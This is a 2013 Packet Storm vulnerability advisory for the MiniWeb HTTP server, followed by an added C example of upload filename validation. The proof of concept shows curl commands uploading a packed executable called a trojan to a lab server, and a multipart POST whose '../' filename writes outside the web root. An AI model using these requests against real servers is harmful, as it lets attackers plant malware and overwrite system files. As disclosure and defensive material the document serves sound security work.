MiniWeb File Upload / Directory Traversal

09 Apr 2013 | Reported by Akastep | Type: packetstorm | Source: packetstormsecurity.com

MiniWeb HTTP server with low resource consumption, supports file uploading, and 7-zip decompression, vulnerable to remote arbitrary file upload and directory traversal on Windows XP SP2 32 bi

Code
`============================================================================================  
Vulnerable Software: MiniWeb (build 300, built on Feb 28 2013)  
Official Site: http://miniweb.sourceforge.net/  
Vulns: Remote arbitrary file upload,Directory traversal.  
Tested Software/version: MiniWeb (build 300, built on Feb 28 2013)  
Tested on: Windows XP SP2 32 bit.  
=================================About software:===========================================  
MiniWeb is a mini HTTP server implementation written in C language, featuring low system resource consumption,  
high efficiency, good flexibility and high portability. It is capable of serving multiple clients with a single thread,  
supporting GET and POST methods, authentication,  
dynamic contents (dynamic web page and page variable substitution) and file uploading.  
MiniWeb runs on POSIX compliant OS, like Linux, as well as Microsoft Windows (Cygwin, MinGW and native build with Visual Studio).  
The binary size of MiniWeb can be as small as 20KB (on x86 Linux). The target of the project is to provide a fast,  
functional and low resource consuming HTTP server that is embeddable in other applications (as a static or dynamic library)  
as well as a standalone web server.  
  
MiniWeb supports transparent 7-zip decompression. Web contents can be compressed into  
7-zip archives and clients can access the contents inside the 7-zip archive just like in a directory.  
  
MiniWeb can also be used in audio/video streaming applications,  
or more specifically, VOD (video-on-demand) service. Currently a VOD client/server is being developed on MiniWeb.  
============================================================================================  
  
About vulns:  
This software suffers from 2 critical vulns:  
Any remote/local user can upload arbitrary files to web server.  
Proof of concept:  
  
In this scenario, using Cygwin + curl, a remote attacker uploads a trojan called "taskmgr.exe" to the remote web server.  
  
  
user@myhost /cygdrive/c/dir1/dir2  
$ ipconfig  
  
Настройка протокола IP для Windows  
  
  
Подключение по локальной сети - Ethernet адаптер:  
  
Состояние сети . . . . . . . . . : сеть отключена  
  
VirtualBox Host-Only Network - Ethernet адаптер:  
  
DNS-суффикс этого подключения . . :  
IP-адрес . . . . . . . . . . . . : 192.168.0.1  
Маска подсети . . . . . . . . . . : 255.255.255.0  
Основной шлюз . . . . . . . . . . : 192.168.0.1  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl -I 192.168.0.15:8000  
curl: (52) Empty reply from server  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl 192.168.0.15:8000  
<html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td  
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></  
table><hr><i>Directory content generated by MiniWeb</i></body></html>  
user@myhost /cygdrive/c/dir1/dir2  
  
$ #Uploading remotely our trojan to remote system.  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl -i -F name=taskmgr.exe -F [email protected] http://192.168.0.15:8000/epicfail/  
HTTP/1.1 404 Not Found  
Server: MiniWeb  
Content-length: 125  
Content-Type: text/html  
  
<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL has no content.</p></body></html>  
user@myhost /cygdrive/c/dir1/dir2  
$ #Now fetching directory index from remote system.  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl 192.168.0.15:8000  
<html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td  
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t  
r><td width=35%><a href='taskmgr.exe'>taskmgr.exe</a></td><td width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013  
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by MiniWeb</i></body></html>  
user@myhost /cygdrive/c/dir1/dir2  
user@myhost /cygdrive/c/dir1/dir2  
  
$ #Lol our trojan (taskmgr.exe) uploaded successfully) This is design flaw.  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl 192.168.0.15:8000/taskmgr.exe>task2.exe  
  
  
user@myhost /cygdrive/c/dir1/dir2  
$ file task2.exe  
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed  
  
user@myhost /cygdrive/c/dir1/dir2  
$ rm -rf task2.exe  
  
  
So, this means any remote user can upload, spoof and overwrite any files on the remote server.  
  
Moreover, this web server software contains a directory traversal vuln.  
Using the second vuln, it is possible to upload any trojan outside of the document root to the operating system and spoof some system executables, and as a result  
compromise the remote operating system, e.g. on the next reboot when it starts.  
In this case the attacker uses Fiddler:  
  
================================================================================  
METHOD: POST  
URL: http://192.168.0.15:8000/AAAAAAAAAAAAAAAAAAAAAAA  
  
Host: 192.168.0.15:8000  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------78522398122376  
Content-Length: 84906  
  
  
request body:  
  
  
-----------------------------78522398122376  
Content-Disposition: form-data; name="user"  
  
-----------------------------78522398122376  
Content-Disposition: form-data; name="pass"  
  
-----------------------------78522398122376  
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"  
Content-Type: image/png  
  
Dude! Your machine OwnEd!  
  
-----------------------------78522398122376  
Content-Disposition: form-data; name="button"  
  
Upload  
-----------------------------78522398122376--  
  
================================================================================  
  
Few Printscreens:  
  
1remotesystem.PNG  
  
http://s019.radikal.ru/i612/1304/09/510e3b430b04.png  
  
  
  
  
2attackersends.PNG  
  
http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png  
  
  
3remotesystempwned.PNG  
  
  
http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png  
  
  
  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
waraxe.us  
exploit-db.com  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers+ ottoman38 & HERO_AZE  
  
*Super special KUDOS to my bro Brendan Coles!  
Love you and Respect you dude!  
Thank you!*  
================================================  
  
/AkaStep  
  
  
  
  
`
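
One way a server could refuse the filename sent in the traversal request above, and the executable upload before it, shown as an added example (not MiniWeb's code and not part of the advisory). UPLOAD_ROOT, the function names and the extension allowlist are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define UPLOAD_ROOT "C:\\miniweb\\uploads"  /* assumed storage directory */

/* Assumed policy: only these extensions may be stored. */
static const char *const ALLOWED_EXT[] = { ".txt", ".png", ".jpg", NULL };

static int ext_equal(const char *a, const char *b)
{
    for (; *a && tolower((unsigned char)*a) == tolower((unsigned char)*b); a++, b++)
        ;
    return *a == '\0' && *b == '\0';
}

/* Returns 1 if the client-supplied name is a plain, storable file name. */
int upload_name_ok(const char *name)
{
    size_t len = name ? strlen(name) : 0;
    if (len == 0 || len > 64)
        return 0;
    /* A leading dot covers "." and ".."; Windows drops a trailing dot or
     * space, which would change the name after the check. */
    if (name[0] == '.' || name[len - 1] == '.' || name[len - 1] == ' ')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        /* Allowlist, so '/', '\\', ':', '%' and control bytes never pass. */
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return 0;
    }
    const char *ext = strrchr(name, '.');
    for (size_t i = 0; ext && ALLOWED_EXT[i]; i++)
        if (ext_equal(ext, ALLOWED_EXT[i]))
            return 1;
    return 0;
}

/* Writes UPLOAD_ROOT\name to out. Returns 0 on success, -1 if refused. */
int build_upload_path(const char *name, char *out, size_t outlen)
{
    if (!upload_name_ok(name))
        return -1;
    int n = snprintf(out, outlen, "%s\\%s", UPLOAD_ROOT, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}
```

The returned path should be opened with exclusive-create semantics (for example O_CREAT | O_EXCL) so an upload cannot replace an existing file. Reserved Windows device names are not handled here.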
